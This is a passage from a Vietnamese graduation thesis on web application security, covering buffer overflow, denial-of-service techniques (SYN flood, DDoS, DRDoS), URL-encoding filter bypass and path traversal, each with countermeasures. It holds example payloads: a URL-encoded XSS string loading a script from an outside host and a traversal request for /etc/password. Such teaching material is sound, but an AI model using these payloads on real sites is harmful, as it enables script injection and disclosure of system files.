MỘT SỐ CÁCH GÂY TRÀN BỘ ĐỆM QUA ỨNG DỤNG WEB

Một phần của tài liệu Tài liệu Luận văn tốt nghiệp Nghiên cứu một số vấn đề về bảo mật ứng dụng Web trên internet pdf (Trang 109)

DỤNG WEB:

Các bước cơ bản của kỹ thuật tràn bộđệm là: chuẩn bị bộđệm dùng để làm tràn, xác

định địa chỉ trả về (RET), xác định địa chỉ của bộđệm chứa shellcode, cuối cùng gọi thực thi chương trình bị tràn bộđệm.

Thông qua những ô nhập dữ liệu hacker có thể sử dụng một chuỗi string nhị phân có khả năng thực thi đoạn lệnh trên máy đích hoặc phá vỡ hệ thống do phải xử lí dữ liệu quá dài, vượt khả năng cho phép của hệ thống ( có thể nói cách này cũng là cách tấn công DoS-được nói rõ hơn trong chương 6). Thông thường đoạn mã rất đơn giản, ví dụ như exec(“sh”) để tạo ra một root shell.

Một ví dụ về cách tấn công buffer overflow qua Web là Code Red Worm.

IV. CÁC CÁCH PHÒNG CHỐNG:

• Người thiết kế Web cần phải kiểm tra kĩkích thước dữliệu trước khi sửdụng.

• Dùng Referer trong HTTP Header để kiểm tra yêu cầu có phải xuất phát từ máy người dùng

Nhận xét:

Đây là kĩ thuật tấn công đi sâu vào phần hệ thống nhất, đòi hỏi hacker là người hiểu sâu vềtổchức bộnhớcũng nhưvềngôn ngữlập trình Assembly. Tuy nhiên,điều này chỉ đòi hỏi nếu hacker muốn điều khiển hệ thống. Nếu chỉ sửa đồi nội dung kích thước ô nhập để từ đóđưa lên trình chủ một khối dữ liệu lớn để hệ thống có thể bị

Chương 8: Tràn bộđệm (Buffer Overflow)

công này tương tự như kiểu tấn công từ chối dịch vụ được nói rõ hơn trong chương tiếp theo.

Chương 9: Từ chối dịch vụ (Dos)

Chương 9

T CHI DCH V

Nội dung:

I. Khái niệm

II. Những khả năng bị tấn công bằng DoSIII. Các kĩthuật tấn công III. Các kĩthuật tấn công

Chương 9: Từ chối dịch vụ (Dos)

CHƯƠNG 9: T CHI DCH V (DoS)

DE

I. KHÁI NIỆM

Tấn công kiểu DoS là kiểu tấn công làm cho các dịch vụ mạng bị tê liệt, không còn khả năng đáp ứng được yêu cầu nữa. Loại tấn công này ảnh hưởng đến nhiều hệ

thống, rất dễ thực hiện và lại rất khó bảo vệ hệ thống khỏi kiểu tấn công DoS.

Thông thường, kiểu tấn công DoS dựa trên những giao thức (protocol). Ví dụ với giao thức là ICMP, hacker có thể sử dụng bomb e-mail để gửi hàng ngàn thông điệp email với mục đích tiêu thụ băng thông để làm hao hụt tài nguyên hệ thống trên mail server. Hoặc có thể dùng phần mềm gửi hàng loạt yêu cầu đến máy chủ khiến cho máy chủkhông thể đápứng những yêu cầu chínhđáng khác.

II. NHỮNG KHẢ NĂNG BỊ TẤN CÔNG BẰNG DOS

• TẤN CÔNG TRÊN SWAP SPACE:

Hầu hết các hệ thống đều có vài trăm MB không gian chuyển đổi ( swap space) để

phục vụ cho những yêu cầu từ máy khách. Swap space thuờng dùng cho các tiến trình con có thời gian ngắn nên DoS có thể được dựa trên phương thức làm tràn

đầy swap space.

• TẤN CÔNG TRÊN BANDWIDTH:

Phần băng thông dành cho mỗi hệ thống là giới hạn, vì thế nếu hacker cùng lúc gửi nhiều yêu cầu đến hệ thống thì phần băng thông không đủ đáp ứng cho một khối lượng dữ liệu lớn đó và dẫn đến hệ thống bị phá vỡ.

Chương 9: Từ chối dịch vụ (Dos)

• TẤN CÔNG VÀO RAM:

Tấn công Dos chiếm 1 khoảng lớn của RAM cũng có thể gây ra các vấn đề phá hủy hệ thống. Kiểu tấn công BufferOverflow là một ví dụ cho cách phá hủy này (xem kĩ hơn trong nội dung chương..)

• TẤN CÔNG VÀO DISKS:

Một kiểu tấn công cổđiển là làm đầy đĩa cứng. Đĩa cứng có thể bị tràn và không thểđược sử dụng nữa.

III. CÁC KĨ THUẬT TẤN CÔNG:

III.1. Khái nim v Tcp bt tay ba chiu:

Đầu tiên, để tìm hiểu phương pháp tấn công DoS , luận văn sẽ trình bày cơ chế

làm việc “tcp bt tay ba chiu”.

Gói dữ liệu TCP chứa flag bits (cờ) để mô tả nội dung và mục đích của gói dữ

liệu .

Ví dụ9.III.1-1:

• Gói dữ liệu TCP với cờ SYN (synchoronize) dùng để bắt đầu 1 kết nối

• ACK (acknowledgement)

• FIN (finish) dùng để cắt 1 kết nối Cách hoạt động của gói TCP:

Chương 9: Từ chối dịch vụ (Dos)

Hình 9.III.1-1: Cơ chếthiết lập kết nối trước khi truyền số liệu

Buớc 1: Máy con gửi gói tin SYN yêu cầu kết nối

Bước 2: Nếu máy chủ chấp nhận kết nối, máy chủ sẽ gửi gói tin SYN/ACK

Server bắt buộc phải gửi thông báo lại bởi vì TCP là chuẩn tin cậy nên nếu máy con không nhận được thông báo thì sẽ nghĩ rằng packet đã bị lạc và gửi lại một packet mới .

Bước 3: Máy con gửi hồi đáp bằng gói tin ACK

Báo cho máy chủ biết rằng máy con đã nhận được SYN/ACK packet và lúc này kết nối đãđược thiết lập.

Chương 9: Từ chối dịch vụ (Dos)

III.2. Li dng TCP thc hin phương pháp SYN flood truyn thng:

Hình 9.III.2-1: Tấn công DoS truyền thống

Nhưđãđề cập về vấn đề thiết lập kết nối trong phần 1, bất cứ 1 gói tin SYN, máy chủ cũng phải để 1 phần tài nguyên của hệ thống như bộ nhớ đệm để nhận và truyền dữ liệu cho đường truyền đó. Tuy nhiên, tài nguyên của hệ thống là có hạn và hacker sẽ tìm mọi cách để hệ thống tràn qua giới hạn đó. ( Đây cònđược gọi là half-open connection vì máy khách mở kết nối giữa chừng)

Theo hình 9.III.2-1: Nếu máy chủ sau khi gửi trả một gói tin SYN/ACK để thông báo chấp nhận kết nối cho máy yêu cầu nhưng nếu địa chỉ IP của máy yêu cầu này là giả mạo thì gói tin không thể đến được đích, nên máy chủ vẫn phải dành tài nguyên cho yêu cầu đó. Sau một thời gian không nhận được phản hồi từ máy khách, máy chủ lại tiếp tục gửi một gói tin SYN/ACK để xác nhận lần nữa và cứ

như vậy, kết nối vẫn tiếp tục mở.

Nếu như hacker gửi nhiều gói tin SYN đến máy chủđến khi máy chủ không thể

Chương 9: Từ chối dịch vụ (Dos)

Kết luận:

Chỉ với một đường truyền băng thông nhỏ, hacker đã có thể phá vỡ một hệ thống. Thêm vào đó, địa chỉ IP của hacker có thểđược sửa đổi nên việc xác định thủ

phạm là một vấn đề hết sức khó khăn.

III.3. Tn công vào băng thông III.3.1. Kiu tn công th 1

Hacker hoàn toàn có khả năng làm ngập hệ thống vì băng thông của hacker lớn hơn băng thông của máy đích. Kiểu tấn công này không bị hạn chế bởi tốc độ

truyền mạng.

Ví dụ 9.III.3.1-1: Hacker có một đường truyền tốc độ cao T1 ( 1.544- Mbps ) hay lớn hơn có thể dễ dàng phá vỡ một hệ thống có đường truyền 56Kbps.

III.3.2. Kiu tn công th 2

Kiểu tấn công này được sử dụng khi đường truyền mạng của hacker là quá thấp so với đường truyền của máy đích.

Không giống như kiểu tấn công DoS truyền thống ( phần 2 ), kiểu tấn công vào băng thông lớn hơn sẽ lợi dụng những gói tin từ những hệ thống khác nhau cùng một lúc tiến đến hệ thống đích khiến cho đường truyền của hệ thống đích không còn khả năng đáp ứng, máy chủ không còn khả năng nhận một gói tin nào nữa.

Chương 9: Từ chối dịch vụ (Dos)

Hình 9.III.3.2-1: Kiểu tấn công DoS vào băng thông

Theo hình 9.III.3.2-1, tất cả các gói tin đi vào 1 mạng máy tính qua 1 "Big-Pipe" (

ống dẫn lớn ), sau đó được router chia ra những "Small Pipe" ( ống dẫn nhỏ ) cho nhiều máy tính con tùy theo địa chỉ IP của gói tin.

Nhưng nếu toàn bộ "Big-Pipe" bị làm ngập bằng những gói tin chỉ hướng đến 1 máy nhất định trong mạng máy tính con này, router đành phải chấp nhận loại bỏ

phần lớn các packet để chỉ còn lại số lượng vừa đủ đi qua "Small Pipe" của máy tính đó. Kiểu tấn công này sẽ loại máyđích ra khỏi Internet.

Đây là phương pháp tấn công kiểu từ chối dịch vụ nhưng không là DoS mà gọi là DDoS ( kiểu từ chối dịch vụ phân tán ), nghĩa là cùng một lúc nhiều máy sẽ được phát động để gửi gói tin đến máy đích ( mặc dù đường truyền của mỗi máy không cao nhưng nhiều đường truyền lại hợp thành một ống dẫn “ Big Pipe”), làm cho máy đích không còn khả năng tiếp nhận gói tin và bị loại khỏi mạng Internet, như

Chương 9: Từ chối dịch vụ (Dos)

computer con tùy

Hình 9.III.3.2-2: Tấn công DDoS

™ DRDoS (Distributed Reflection Denial of Service) - Thế hệ tiếp theo của DDoS:

Đây cũng chính là nguyên nhân khiến cho trang grc.com bị phá vỡ. Hình sau sẽ minh họa kiểu tấn công DRDoS này.

Chương 9: Từ chối dịch vụ (Dos)

Hình 9.III.3.2-3. Tấn công kiểu DRDoS

Bằng cách giả địa chỉ IP của máy đích, hacker sẽ cùng lúc gửi nhiều gói tin

đến các hệ thống máy mạnh trên mạng, các hệ thống này khi nhận gói tin SYN giả này, chấp nhận kết nối và gửi trả một gói tin SYN/ACK để thông báo. Vì

địa chỉ IP của gói tin SYN bị hacker sửa đổi thành địa chỉ IP máy đích nên những gói tin SYN/ACK sẽ được gửi về cho máy đích. Cùng một lúc nhận

được nhiều gói tin, đường truyền của máy đích không đủ khả năng đáp ứng, hệ

thống máy đích từ chối nhận bất kì gói tin nào và lúc này hệ thống máy đích

Chương 9: Từ chối dịch vụ (Dos)

III.4. Kiu tn công vào tài nguyên h thng

Đây là kiểu tấn công nhằm vào tài nguyên hệ thống hơn là tài nguyên mạng như

CPU, bộ nhớ, file hệ thống, tiến trình…..Hacker là một người dùng hợp lệ của hệ

thống, và được một lượng tài nguyên giới hạn trên hệ thống. Tuy nhiên, hacker sẽ

lạm dụng quyền truy cập này để yêu cầu thêm tài nguyên. Như vậy, hệ thống hay những người dùng hợp lệ sẽ bị từ chối sử dụng tài nguyên chia sẻ.

Kiểu tấn công sẽ khiến cho hệ thống không thể sử dụng được vì tài nguyên đã bị

sử dụng hết, không còn tiến trình để thực thi nữa.

IV. BIỆN PHÁP PHÒNG CHỐNG

Kiểu tấn công từ chối dịch vụ là kiểu tấn công gây nhiều khó khăn trong vấn đề bảo vệ cũng như điều tra tìm ra thủ phạm nhất, bởi vì hầu hết hacker đã thay đổi địa chỉ

IP của máy mình nên rất khó xác định ai là thủ phạm.

Để phòng chống khả năng khuyếch đại đường truyền, cần:

• Huỷkhả năng broadcast tại router biên

• Tăng kích thước hàng đợi kết nối

-> kết quả: có thể phòng tránh khả năng tràn hàng đợi qua nhiều kết nối, nhưng cách này sử dụng nhiều tài nguyên

• Giảm thời gian thiết lập kết nối

• Dùng những phần mềm phát hiện và phá hủy kiểu tấn công DoS:

Hầu hết những hệ điều hành hiện nay đều hỗ trợ khả năng phát hiện và phòng chống kiểu tấn công lụt SYN.

Chương 9: Từ chối dịch vụ (Dos)

Tuy nhiên cũng đã có những phần mềm được có khả năng tránh kiểu tấn công này. Ví dụ như với Linux kernels 2.0.30 và về sau cài đặt một tùy chọn gọi làSYN Cookie, kernel có nhiệm vụ truy tìm và lưu vết những khả năng có thể xảy ra kĩ thuật SYN. Sau đó, kernel sẽ sử dụng một giao thức mã hoá như SYN cookie cho phép người dùng hợp lệ của hệ thống tiếp tục kết nối đến hệ thống

Với WindowNT 4.0 trở về sau, sử dụng kĩ thuật backlog, mỗi khi hàng đợi kết nối không đủ đáp ứng, hệ thống tự động cung cấp tài nguyên cho hàng đợi, vì thế hàng

đợi sẽ không bị phá vỡ.

• Ứng dụng chỉcho phép mỗi một máy con chỉ được thiết lập sốkết nối tối đa theo quiđịnh tránh trường hợp hacker gửi cùng lúc nhiều yêu câu gây tắc nghẽn.

Nhận xét:

Kiểu tấn công từ chối dịch vụ tuy chỉ khiến cho hệ thống bị phá vỡ trong vài phút nhưng hậu quả thì khá to lớn (ảnh hưởng trên phạm vi tiền và uy tín). Đây là kĩ thuật thường được hacker sử dụng trong trường hợp không thể chiếm quyền quản trị trên hệ thống hoặc thông tin, hoặc muốn phá hủy uy tín của cơ quanđó.Thêm vàođó việc giả mạođịa chỉ khiến cho hacker càng dễ dàng thực hiện viêc tấn công mà không sợ

bị phát hiện. Thông thường kĩ thuật này được thực hiện kèm theo sự hỗ trợ của vài công cụ như ping of death, teardrop…Những công cụ này được liệt kê thêm trong chương 8 tiếp theo.

Chương 10: Một số kĩ thuật tấn công khác

Chương 10

MT S KĨ THUT TN CÔNG KHÁC

Nội dung:

I. Mã hóa URL.

II. Kiểu tấn công vượtđường dẫn III. Tấn công dựa vào kí tựrỗng IV. Ngôn ngữtrình chủ

Chương 10: Một số kĩ thuật tấn công khác

CHƯƠNG 10: MT S KĨ THUT TN CÔNG KHÁC

DE

I. MÃ HÓA URL (URL Encoding)

I.1. Khái nim

Theo RFC 1738 định nghĩa URL và RFC 2369 cho URIs, những kí tự được giới hạn sử dụng trên URL hoặc URI là một tập các kí tự US-ASCII. Theo RFC 1738, 2369 những kí tự chữ số, kí tự đặc biệt như “ $-_.+!*’() ” và một số kí tự dành riêng là không bị mã hoá trên URL hay URIs. Còn những kí tự đặc biệt khác thì

được mã hóa như khoảng trắng, < > ”…Sau khi trình chủ nhận được dữ liệu này, trình chủ sẽ tựđộng giải mãđể thao tác như bình thường.

Vậy hacker có thể lợi dụngđược gì trong URL mã hóa này.

Những nhà phát triển ứng dụng có thể sẽ thiết kế ứng dụng để kiểm tra dữ liệu nhập vào của người dùng có hợp lệ hay không, những kí tự đặc biệc như < > trong thẻ script thường được dùng trong những kĩ thuật tấn công như XSS sẽ bị

lọai bỏ Vậy để hợp thức hóa nội dung dữ liệu cần nhập, hacker thay vì nhập trực tiếp kí tự đặc biệt vào ô nhập thì họ có thể nhập những kí tự đãđược mã hoá theo chuẩn RFC 1738, RFC 2369. Như vậy bằng cách đó, hacker có thể dễ dàng vượt qua kiểm soát này.

Chương 10: Một số kĩ thuật tấn công khác

Ví dụ10.I.1-1:

http://www.myserver.c0m/script.php?mydata=%3cscript%20src=%22htt p%3a%2f%2fwww.yourserver.com%2fbadscript.js%22%3e%3c%2fscript%3e

Biến mydata sẽ mang nội dung:

<script src="http://www.yourserver.com/badscript.js"></script>

I.2. Mt sbin pháp phòng chng

• Tránh sử dụng phương thức GET vì nếu dùng GET, dữ liệu dễ dàng được thêm vào URL. Vì thế, sử dụng phương thức POST bất cứ khi nào có thể.

• Trong trường hợp URL bắt buộc được sử dụng để chuyển dữ liệu lên trình chủ, cần giới hạn kiểu dữ liệu, nên kiểm tra dữ liệu trong ứng dụng trước khi sử dụng.

• Không nên sử dụng ngôn ngữ máy khách để kiểm tra tính đúng đắn của dữ

liệu.

II. KIỂU TẤN CÔNG VƯỢT ĐƯỜNG DẪN

II.1. Khái nim

Nhiều ứng dụng sử dụng tập tin hệ thống của trình chủ trong “lớp trình bày” để

hiển thị thông tin lưu trử tạm thời. Những tập tin này bao gồm những tập tin hình

ảnh , tập tin HTML, hay những ứng dụng CGI. Thư mục WWW-ROOT là một thư mục gốc ảo bên trong trình chủ, nơi mà được truy xuất bởi trình duyệt. Ứng dụng lưu trữ thông tin bên trong hoặc bên ngòai WWW-ROOT.

Nếu ứng dụng không kiểm tra những kí tự đặc biệt, thường được sử dụng trong

Chương 10: Một số kĩ thuật tấn công khác

vượt đường dẫn. Hacker có thể yêu cầu trình chủ trả về kết quả là nội dung những tập tin vật lí như /etc/password…

Tóm lại:

Kiểu tấn công này cũng dựa vào sự lỏng lẻo trong quá trình kiểm tra dữ liệu trên URL, cookie, HTTP Header yêu cầu. Lợi dụng quyền truy xuất một tập tin của

ứng dụng, nhờ đó hacker có thể xemđược file lưu trữ trên hệ thống. Ví dụ10.II.1-1:

http://maydich.com/show.asp?result= “dangnhapthanhcong.asp”

nhưng nếu hacker thayđổi tên tập tin cần truy xuất nhưsau:

http://maydich.com/show.asp?result= ../etc/password

Một phần của tài liệu Tài liệu Luận văn tốt nghiệp Nghiên cứu một số vấn đề về bảo mật ứng dụng Web trên internet pdf (Trang 109)

Tải bản đầy đủ (PDF)

(169 trang)